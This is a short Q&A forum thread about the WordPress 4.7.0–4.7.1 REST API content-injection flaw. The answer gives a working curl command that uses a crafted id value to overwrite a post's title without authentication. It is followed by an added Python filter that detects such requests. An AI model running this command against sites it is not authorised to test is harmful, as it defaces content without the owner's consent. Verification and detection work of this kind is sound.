0 votes
WordPress versions 4.7.0 and 4.7.1 are vulnerable to Content Injection. How can I validate the vulnerability?
by (147 points)

1 Answer

0 votes

Through this vulnerability, an unauthenticated user can modify the content of any post or page. Let's say the post ID is 1; you can change the title using this curl command.

curl 'https://www.example.com/blog/wp-json/wp/v2/posts/1' -X 'POST' -F 'id=1changecontent' -F 'title=Codeshikari' 

If your site is vulnerable then the title of the post id 1 will change to "Codeshikari".

by (188 points)
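
A defensive counterpart to the request above, as an added example that is not part of the original answer: a filter that flags write requests to the posts route whose `id` parameter is not a plain integer or disagrees with the ID in the URL. The function names and sample requests are constructed for illustration, and the filter assumes the caller has already decoded the form body into a dictionary.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Route shape used in the command above: .../wp-json/wp/v2/posts/<numeric id>
POST_ROUTE = re.compile(r"/wp-json/wp/v2/posts/([0-9]+)/?$")
WRITE_METHODS = {"POST", "PUT", "PATCH"}


def check_request(method, url, form_fields=None):
    """Return a reason string when a write request carries a suspicious `id`
    parameter, or None when the request looks consistent."""
    parts = urlsplit(url)
    match = POST_ROUTE.search(parts.path)
    if match is None or method.upper() not in WRITE_METHODS:
        return None
    route_id = int(match.group(1))
    # Gather `id` from the query string and from the decoded form body.
    values = [v for k, v in parse_qsl(parts.query, keep_blank_values=True) if k == "id"]
    if form_fields and "id" in form_fields:
        values.append(form_fields["id"])
    for value in values:
        if not re.fullmatch(r"[0-9]+", value):
            return "non-numeric id"      # e.g. id=1changecontent
        if int(value) != route_id:
            return "id mismatch"         # parameter disagrees with the URL
    return None


def flag_requests(requests):
    """Return (index, reason) for every flagged request in the list."""
    flagged = []
    for index, (method, url, fields) in enumerate(requests):
        reason = check_request(method, url, fields)
        if reason:
            flagged.append((index, reason))
    return flagged


# Constructed sample traffic (not taken from a real site).
BASE = "https://www.example.com/blog/wp-json/wp/v2/posts/1"
SAMPLE = [
    ("GET", BASE, None),
    ("POST", BASE, {"title": "Edited by an editor"}),
    ("POST", BASE, {"id": "1changecontent", "title": "Codeshikari"}),
    ("POST", BASE + "?id=2", {"title": "x"}),
]

if __name__ == "__main__":
    for index, reason in flag_requests(SAMPLE):
        print(index, reason)
```

Only the route shape from the command above is covered; other ways of addressing the same endpoint would need their own patterns.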